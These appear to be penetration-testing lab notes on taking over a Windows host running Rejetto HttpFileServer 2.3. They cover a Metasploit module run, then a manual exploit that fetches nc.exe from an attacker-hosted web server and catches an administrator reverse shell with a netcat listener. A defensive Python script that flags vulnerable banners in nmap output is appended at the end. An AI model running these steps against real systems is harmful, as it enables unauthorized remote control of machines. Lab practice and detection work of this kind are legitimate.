# HttpFileServer httpd 2.3 (Rejetto)

## Enumeration

```
nmap -sV -p 80 10.4.19.119
```

```
80/tcp open  http    HttpFileServer httpd 2.3
```

## Exploitation

```
search hfs
use exploit/windows/http/rejetto_hfs_exec
options
# Check the other options (TARGETURI, payload options, LHOST, LPORT) and set them if necessary
exploit
```

After running this module you will get a Meterpreter session.

## Manual Exploitation

```
nmap -sV 10.2.23.79
```

```
80/tcp    open  http               HttpFileServer httpd 2.3
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49165/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```

* Use `searchsploit` to identify `HttpFileServer httpd 2.3` vulnerabilities

```
searchsploit HTTP File Server 2.3
```

* Copy the exploit to the Desktop

```
cd Desktop/
searchsploit -m 39161
```

#### Analyzing the Exploit

```
vim 39161.py
```

* Read the exploit
  * *You need to be using a web server hosting netcat (`http://<attackers_ip>:80/nc.exe`). You may need to run it multiple times for success!*
  * `ip_addr` - change to the attacker's Kali Linux IP
  * `local_port` - change to 1234

#### Execute the Exploit

* Save and run the exploit

```
# In a new terminal session
cd Desktop/
cp /usr/share/windows-resources/binaries/nc.exe .
python -m SimpleHTTPServer 80
```

```
# In a new terminal session
# Run the netcat listener on the "local_port" specified in the exploit
nc -nvlp 1234
```

```
# From the first terminal window, run the exploit
python 39161.py 10.2.23.79 80
```

```
whoami
	win-omcnbkr66mn\administrator
systeminfo
```
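
For the defender's side of the scans above, this added example (not part of the original notes) parses `nmap -sV` normal output and flags hosts advertising the `HttpFileServer httpd 2.3` banner, along with the other ports open on them. The function names, the `FLAGGED_VERSIONS` set and the sample scan text are assumptions constructed for illustration.

```python
import re

# Lines of nmap's normal output: host header and "PORT STATE SERVICE VERSION" rows.
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+(\S+)\s*(.*)$")
# Banner string taken from the scan output on this page.
HFS_RE = re.compile(r"HttpFileServer httpd (\S+)")
# Assumption: only the release shown on this page is flagged; extend as needed.
FLAGGED_VERSIONS = {"2.3"}

def parse_hosts(nmap_text):
    """Return {host: [(port, service, version_banner), ...]} for open ports."""
    hosts, current = {}, None
    for line in map(str.strip, nmap_text.splitlines()):
        host, port = HOST_RE.match(line), PORT_RE.match(line)
        if host:
            current = hosts.setdefault(host.group(1), [])
        elif port and current is not None:
            current.append((int(port.group(1)), port.group(2), port.group(3).strip()))
    return hosts

def find_hfs(nmap_text):
    """Return one finding per service whose banner is a flagged HFS version."""
    findings = []
    for host, services in parse_hosts(nmap_text).items():
        for port, _svc, banner in services:
            m = HFS_RE.search(banner)
            if m and m.group(1) in FLAGGED_VERSIONS:
                others = sorted(p for p, _, _ in services if p != port)
                findings.append({"host": host, "port": port,
                                 "version": m.group(1), "other_open_ports": others})
    return findings

# Constructed sample: rows for 10.2.23.79 mirror this page, the rest is made up.
SAMPLE = """\
Nmap scan report for 10.2.23.79
80/tcp    open  http               HttpFileServer httpd 2.3
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
Nmap scan report for 192.0.2.10
80/tcp    open  http               nginx
8080/tcp  open  http               HttpFileServer httpd 2.4
"""

if __name__ == "__main__":
    for f in find_hfs(SAMPLE):
        print(f"{f['host']}:{f['port']} HttpFileServer {f['version']}, also open: {f['other_open_ports']}")
```
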
